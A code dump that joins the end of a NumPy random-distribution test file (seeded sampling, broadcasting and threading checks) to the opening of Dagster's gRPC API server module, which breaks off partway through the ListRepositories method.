assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
if __name__ == "__main__":
run_module_suite()
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class RepositorySymbolsAndCodePointers:
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._repository_symbols_and_code_pointers = RepositorySymbolsAndCodePointers(
loadable_target_origin
)
try:
self._repository_symbols_and_code_pointers.load()
except Exception:
if not lazy_load_user_code:
raise
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Run execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
sys.executable,
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
